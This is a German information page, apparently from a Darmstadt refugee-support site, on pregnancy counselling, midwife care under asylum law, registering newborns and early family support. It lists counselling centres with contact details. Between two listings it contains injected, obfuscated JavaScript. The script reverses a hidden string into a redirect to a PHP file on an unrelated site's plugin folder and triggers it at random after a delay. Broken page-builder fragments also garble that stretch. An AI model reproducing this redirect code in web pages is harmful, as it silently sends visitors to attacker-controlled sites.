Schwangerschaft und Sexualität

Startseite » Unsere Themen » Gesundheit » Schwangerschaft und Sexualität

Schwangerschaft und Sexualität

Schwangerschaft und alle Dinge rund um die Geburt eines Kindes werfen für viele Geflüchtete oft eine Reihe von Themen und Fragen auf. Welche Unterstützung es gibt und welche Rahmenbedingungen besonders während des Asylverfahrens gelten, finden Sie hier.

Schwangerenberatung, Aufklärung & Verhütung

Schwangerenberatungsstellen unterstützen und beraten Frauen und (werdende) Mütter in Fragen rund um Schwangerschaft, Sexualität und Verhütung. Die Beratung ist kostenfrei und kann auf Wunsch anonym durchgeführt werden. Zum Teil können auch Gruppenpräventionsveranstaltungen vor Ort angeboten werden.

Landgraf-Georg-Str. 120
64287 Darmstadt
06151 / 429420
06151 / 4294227
darmstadt@profamilia.de
Homepage

Telefonzeiten zur Terminvereinbarung in Darmstadt und Groß-Umstadt:
Täglich von 10:00-12:00 Uhr
Montag, Mittwoch und Donnerstag: 15:30-17:00 Uhr

 

Offene Sprechstunden:
(nur für dringende Fälle)
Darmstadt: Donnerstag 15:00-18:00 Uhr
Groß-Umstadt: Freitag 9:00-12:00 Uhr

Beratungszentrum  Darmstadt
Kiesstr. 14
06151 / 926-0
06151 / 926-100
  schwanger@diakonie-darmstadt.de

ina.maul@diakonie-darmstadt.de

Homepage

 

Beratungszeiten:
Termine nach Vereinbarung.

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and Südhessen e.V.” tab_id=”1521110837835-22a904ad-f6b0″]

Aufsuchende Beratung Schwangerschaft und Flucht
Carina Stey
donum vitae Beratungsstelle
Bismarckstraße 45
64293 Darmstadt
0176 / 64 40 03 57
stey@donumvitae.org

Homepage

Mehrsprachige Arbeitshilfen

 

Offene Sprechzeiten:
Mittwoch: 10:00-15:00 Uhr

Darmstraße 2
64287 Darmstadt
06151 / 425541
Homepage

”Caritasverband Darmstadt e.V.” tab_id=”1521553980078-a717f29a-02a3″]

Hebammenversorgung

Gem. § 4 Abs. 2 AsylblG sind werdenden Müttern und Wöchnerinnen ärztliche und pflegerische Hilfe und Betreuung, Hebammenhilfe, Arznei-, Verband- und Heilmittel zu gewähren. Frauen, die Leistungen nach dem Asylbewerberleistungsgesetz beziehen und noch nicht krankenversichert sind, müssen daher die Vor- oder Nachsorge durch eine Hebamme bei den entsprechenden Leistungssachbearbeiterinnen und Leistungssachbearbeitern beantragen. Auch die Abrechnung erfolgt über die Leistungssachbearbeitung. Bei Frauen, die krankenversichert sind, erfolgt die Beantragung und Abrechnung wie gewohnt über die zuständige Krankenkasse.

Registrierung des Kindes

Da Menschen, die auf der Flucht waren, häufig keine oder nicht den deutschen Standards entsprechenden Dokumente besitzen, gestaltet sich die Registrierung von Neugeborenen sowie die Ausstellung von Geburtsurkunden manchmal schwierig. Hier finden Sie nützliche Hinweise und Adressen.

Netzwerk Frühe Hilfen

Frühe Hilfen streben an „Entwicklungsmöglichkeiten von Kindern und Eltern in Familie und Gesellschaft frühzeitig und nachhaltig zu verbessern. Neben alltagspraktischer Unterstützung wollen Frühe Hilfen insbesondere einen Beitrag zur Förderung der Beziehungs- und Erziehungskompetenz von (werdenden) Müttern und Vätern leisten. Damit tragen sie maßgeblich zum gesunden Aufwachsen von Kindern bei und sichern deren Rechte auf Schutz, Förderung und Teilhabe“ (NZFH 2014).
Für Familien in Darmstadt besteht seit 2009 die Möglichkeit, durch das Darmstädter Modell „Kinder schützen – Familien fördern“, vielfältige präventive Hilfen in Anspruch zu nehmen. Eine Vielzahl von Netzwerkpartnern erbringen die familienunterstützenden Leistungen wie Familienpatenschaften, Baby- und Kleinkindersprechstunde, SchreiBabyAmbulanz, hauswirtschaftliche Hilfe etc.
Angebote im Rahmen der Frühen Hilfen können unabhängig vom aufenthaltsrechtlichen Status in Anspruch genommen werden.
Einige Angebote finden auch in den Erstwohnhäusern bzw. in den dezentralen Unterkünften statt. Dies sind regelmäßige Sprechstunden von Familienkinderkrankenschwestern sowie individuelle Beratung und Begleitung von jungen Eltern durch Familienhebammen und Familienlotsen.

Familienzentrum
Sylke Israel
Frankfurter Straße 71
64293 Darmstadt
06151 / 13-2523
06151 / 13-2815
sylke.israel@darmstadt.de

Das Netzwerk Frühe Hilfen besteht aus zahlreichen Netzwerkpartnerinnen und -partnern, die ihre unterschiedliche Expertise mit einbringen. Hier finden Sie eine Übersicht und weitere Informationen.

Arbeitshilfen